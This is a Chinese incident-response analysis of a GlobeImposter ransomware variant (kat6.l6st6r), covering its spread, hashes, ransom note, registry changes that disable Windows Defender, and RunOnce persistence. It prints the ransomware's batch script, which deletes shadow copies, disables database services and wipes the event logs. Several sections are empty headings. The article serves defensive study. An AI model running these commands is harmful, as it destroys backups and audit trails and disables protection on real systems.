1.勒索病毒组织介绍
1.1传播方式
GlobeImposter主要通过垃圾邮件传播,通常是带有附加ZIP文件的“空白”垃圾邮件,没有邮件内容。它也通过漏洞利用、恶意广告、虚假更新和重新打包的安装程序传播。包含恶意附件或链接的网络钓鱼邮件是一种常见的传播方式。
GlobeImposter 主要通过垃圾邮件传播,常见形式为 “空白” 垃圾邮件,此类邮件无实质内容,仅附带 ZIP 文件。此外,它还通过漏洞利用、恶意广告、虚假更新以及重新打包的安装程序等途径扩散。其中,包含恶意附件或链接的网络钓鱼邮件是一种极为普遍的传播手段,引诱用户点击,进而实现病毒的传播与感染
1.2演变和变种
1.3真实案例
2.1加密器基本信息
| 文件名: | kat6.l6st6r.exe |
|---|---|
| 编译器: | EP:Microsoft Visual C/C++(2017 v.15.5-6)[EXE32] |
| 大小: | 212992(208.00 KiB) |
| 操作系统: | Windows(XP)[I386, 32 位, GUI] |
| 架构: | 386 |
| 模式: | 32 位 |
| 类型: | EXEC |
| 字节序: | LE |
| MD5: | e6e453fbd63daf12d55850da6a206746 |
| SHA1: | 492dc14af4b2d689bb96ab94256c63cba9b0a47c |
| SHA256: | eb0e1171d6112cb56ffb0f306d92cbbd3f2af9067328bc28de198365e6ce4e10 |
2.2勒索信
nl 89 4P BM 3Z GU eI Im 2u f9 3U A5 sY tO Fg 6v
7b N4 Vv 3M Kx pF cw zV 4/ JA to Zd 6D 8t Yv 4C
Gp TA fG Tq No IY OC AM y/ Uw GE Et jK hU fM bt
Im i3 al JH 6b a2 hn 4C zx XG iL CY hP 23 oh WW
+X aT 2P +D 2t Nj VD 0D qA vc x7 tH F8 Wf iT 77
dl ce 6j Ky lY W3 Sr d2 lD kq Jt pY c+ RG R2 hk
Vy 13 DE qb 2N ZW N2 4i QU iH iL v4 V0 e3 9j Ge
LZ HA tU 3f Kc f0 aD OA 2O +u 4H G9 sD Xt Vn ch
R+ h+ UT w7 xi u2 MX f5 Eu lw jJ FX 9m 4M Zk OD
dH E+ Ev F0 ST qh 7G VU ty E0 SL CF BC i1 uV Sg
8d YG o9 jI eE mO NY +9 xD gS 6x J7 q6 nR NV 5Q
78 i1 5A hT vB h+ 6y im 9a Si hU dI o1 LV sy eW
iU w4 zh X5 m3 K1 qu Nd Z0 Ry iT b5 hn Cl no bW
C/ TS xe 6I wP dr 9h VR ws Sc Hg 8d O+ X+ 9/ 5d
VF E0 gb /k 5z iD Ry Sn 6f sU 9V +I Y7 cX Pg 5b
+g nR Zw o2 2i Vs dC Zo X0 Zj fo 0v lg p/ cH VR
2T s5 ww h5 V4 GP Qo Tw AI j4 8d KX IT W3 zL 5r
Tv yt Z/ k4 6x 8y AA d4 D5 Q3 6s 9a zi vK YL BX
wT 7/ uA gS XZ v6 ey uo KB 23 wm Ql lJ Jg U8 1f
Ek Kp nb eu KH OD Fe gS w0 jY W/ tr Pn EE Xb Kq
rM lA of lK 9y 4y H2 GU eT E6 Y8 YE Fo PM cA JO
Iy AS 9Z BF He 0=
2.3威胁分析
| 病毒家族 | GlobeImposter |
|---|---|
| 首次出现时间/捕获分析时间 | 2019/08 || 2024/09/01 |
| 威胁类型 | 勒索软件,加密病毒 |
| 加密文件扩展名 | .kat6.l6st6r |
| 勒索信文件名 | HOW TO BACK YOUR FILES.exe和ids.txt |
| 有无免费解密器? | 无 |
| 联系邮箱 | [email protected] |
| 感染症状 | 无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(例如,solar.docx.kat6.l6st6r)。桌面上会显示一条勒索要求消息。网络犯罪分子要求支付赎金(通常以比特币)来解锁您的文件。 |
| 感染方式 | 受感染的电子邮件附件(宏)、恶意广告、漏洞利用、恶意链接 |
| 受灾影响 | 所有文件都经过加密,如果不支付赎金就无法打开。其他密码窃取木马和恶意软件感染可以与勒索软件感染一起安装。 |
2.4加密器逆向分析
2.4.1程序入口(main函数)
2.4.2初始化配置(sub_8C04A0函数)
2.4.3权限提升
TOKEN_ADJUST_PRIVILEGES 和 TOKEN_QUERY的值,判断是否存在权限,如果不存在则调用sub_99fb20函数来实现对当前进程的SE_MANAGE_VOLUME_NAME 和SE_TAKE_OWNERSHIP_NAME 权限的启动
2.4.4注册表修改(sub_9A01D0函数)
7 天HKEY_LOCAL_MACHINESOFTWARE\Policies\Microsoft\Windows NT\Terminal Services注册表的MaxDisconnectionTime和MaxIdleTime键的键值设置为0x240C8400,即7日的毫秒数
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsHomeGroup注册表的DisableHomeGroup键的键值设置为1
禁用Windows Defender的实时保护HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows Defender注册表的DisableAntiSpyware键的键值设置为1
HKEY_LOCAL_MACHINESOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager注册表
HKEY_LOCAL_MACHINESOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Prote注册表中的DisableRealtimeMonitoring、DisableBehaviorMonitoring和DisableOnAccessProtection设置为1
2.4.5权限维持(sub_9A0310函数)
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce注册表的WindowsUpdateCheck键中,实现开机自启。
2.4.6命令执行(sub_9A4A58函数)
@echo off
vssadmin delete shadows /all /quiet
sc config browser
sc config browser start=enabled
sc stop vss
sc config vss start=disabled
sc stop MongoDB
sc config MongoDB start=disabled
sc stop SQLWriter
sc config SQLWriter start=disabled
sc stop MSSQLServerOLAPService
sc config MSSQLServerOLAPService start=disabled
sc stop MSSQLSERVER
sc config MSSQLSERVER start=disabled
sc stop MSSQL$SQLEXPRESS
sc config MSSQL$SQLEXPRESS start=disabled
sc stop ReportServer
sc config ReportServer start=disabled
sc stop OracleServiceORCL
sc config OracleServiceORCL start=disabled
sc stop OracleDBConsoleorcl
sc config OracleDBConsoleorcl start=disabled
sc stop OracleMTSRecoveryService
sc config OracleMTSRecoveryService start=disabled
sc stop OracleVssWriterORCL
sc config OracleVssWriterORCL start=disabled
sc stop MySQL
sc config MySQL start=disabled
del self_path/file >nul
@echo off
vssadmin Delete Shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil cl "%1"
2.4.7遍历磁盘
2.4.8遍历写入勒索信(sub_99F9C0函数)
global://创建的
HOW TO BACK YOUR FILES.exe和当前执行文件名,如果文件名不是这两个则进行下一步的过滤。..
windows
bootmgr
temp
pagefile.sys
boot
ids.txt
ntuser.dat
perflogs
$Recycle.Bin
'.dll', '.lnk', '.ini', '.sys','.bak', '.ba_', '.dbb', '.vmd', '.vbo', '.vdi', '.vhd', '.vhd', '.avh', '.db', '.db2', '.db3', '.dbf', '.mdf', '.mdb', '.sql', '.sql', '.sql', '.sql', '.xml', '.$er', '.4dd', '.4dl', '.^^^', '.abs', '.abx', '.acc', '.acc', '.acc', '.acc', '.acc', '.acc', '.acc', '.adb', '.adb', '.ade', '.adf', '.adn', '.adp', '.alf', '.ask', '.btr', '.cat', '.cdb', '.ckp', '.cma', '.cpd', '.dac', '.dad', '.dad', '.das', '.db-', '.db-', '.db-', '.dbc', '.dbs', '.dbt', '.dbv', '.dbx', '.dcb', '.dct', '.dcx', '.ddl', '.dli', '.dp1', '.dqy', '.dsk', '.dsn', '.dts', '.dxl', '.eco', '.ecx', '.edb', '.epi', '.fcd', '.fdb', '.fic', '.fle', '.fm5', '.fmp', '.fmp', '.fmp', '.fol', '.fp3', '.fp4', '.fp5', '.fp7', '.fpt', '.frm', '.gdb', '.gdb', '.grd', '.gwi', '.hdb', '.his', '.ib', '.idb', '.ihx', '.itd', '.itw', '.jet', '.jtx', '.kdb', '.kex', '.kex', '.kex', '.lgc', '.lwx', '.maf', '.maq', '.mar', '.mar', '.mas', '.mav', '.maw', '.mdb', '.mdn', '.mdt', '.mfd', '.mpd', '.mrg', '.mud', '.mwb', '.myd', '.ndf', '.nnt', '.nrm', '.ns2', '.ns3', '.ns4', '.nsf', '.nv', '.nv2', '.nwd', '.nyf', '.odb', '.odb', '.oqy', '.ora', '.orx', '.owc', '.p96', '.p97', '.pan', '.pdm', '.pnz', '.qry', '.qvd', '.rbf', '.rct', '.rod', '.rod', '.rpd', '.rsd', '.sas', '.sbf', '.scx', '.sdb', '.sdc', '.sdf', '.sis', '.spq', '.te', '.tea', '.tmd', '.tps', '.trc', '.trc', '.trm', '.udb', '.udl', '.usr', '.v12', '.vis', '.vpd', '.vvv', '.wdb', '.wmd', '.wrk', '.xdb', '.xld', '.xml'
2.4.9文件加密(sub_99E8D0函数)
.kat6.l6st6r
3.攻击分析
3.1产品介绍
3.2黑客攻击路线图
4.溯源分析
5.本地复现
5.1弱口令登录
5.2产品特性问题
6.防范措施
以下是solar安全团队近期处理过的常见勒索病毒后缀:
勒索攻击作为成熟的攻击手段,很多勒索家族已经形成了一套完整的商业体系,并且分支了很多团伙组织,导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同,TellYouThePass勒索软件家族常常利用系统漏洞进行攻击;Phobos勒索软件家族通过RDP暴力破解进行勒索;Mallox勒索软件家族利用数据库及暴力破解进行加密,攻击手法极多防不胜防。
|
|
相关文章 |
|
|
|
|
|
|
而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份,在其基础上加强公司安全人员意识。
|
|
相关文章 |
|
|
【教程分享】勒索病毒来袭!教你如何做好数据防护 |
|
|
|
|
|
相关文章 |
|
|
【案例介绍】赎金提高,防御失效:某上市企业两年内两度陷入同一勒索团伙之手 |
漏洞与预防篇侧重于技术层面的防御手段,针对病毒利用的漏洞和安全弱点,提出操作性强的应对方案:
|
|
相关文章 |
|
|
|
|
|
|
|
|
|
应急响应工具教程篇重点分享应急响应过程中常用工具的安装、配置与使用说明,旨在帮助读者快速掌握这些工具的操作流程与技巧,提高其在实际应急场景中的应用熟练度与效率。
|
|
相关文章 |
|
|
|
|
|
【应急响应工具教程】取证工具-Volatility安装与使用 |
|
|
【应急响应工具教程】流量嗅探工具-Tcpdump |
更多资讯 扫码加入群组交流
喜欢此内容的人还喜欢
索勒安全团队
索勒安全团队
索勒安全团
原文始发于微信公众号(solar应急响应团队):【紧急警示】GlobeImposter最新变种kat6.l6st6r利用金万维异速联远程控制漏洞发动大规模勒索攻击
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论